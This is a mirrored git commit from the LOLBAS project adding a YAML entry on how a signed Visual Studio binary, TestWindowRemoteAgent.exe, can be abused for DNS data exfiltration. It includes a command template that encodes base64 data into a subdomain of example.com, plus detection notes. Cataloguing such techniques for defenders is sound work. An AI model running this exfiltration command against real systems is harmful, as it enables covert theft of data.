mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
Create testwindowremoteagent.yaml
This one is pretty straightforward and related to the vstest so pushed the commit for this pull request. TestWindowRemoteAgent.exe is a signed DLL that can be utilized to be a gadget for data exfiltration since it tries connection to any host.
This commit is contained in:
parent
4ffdf0ec0b
commit
c65c9545f5
19
yml/OtherMSBinaries/testwindowremoteagent.yaml
Normal file
19
yml/OtherMSBinaries/testwindowremoteagent.yaml
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
Name: TestWindowRemoteAgent.exe
|
||||
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
|
||||
Author: Onat Uzunyayla
|
||||
Created: 2023-21-08
|
||||
Commands:
|
||||
- Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
|
||||
Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
|
||||
Usecase: Attackers may utilize this to exfiltrate data over DNS
|
||||
Category: Data Exfiltration
|
||||
Privileges: User
|
||||
MitreID: T1048
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
|
||||
Detection:
|
||||
- IOC: TestWindowRemoteAgent.exe spawning unexpectedly
|
||||
Acknowledgement:
|
||||
- Person: Onat Uzunyayla
|
Loading…
Reference in New Issue
Block a user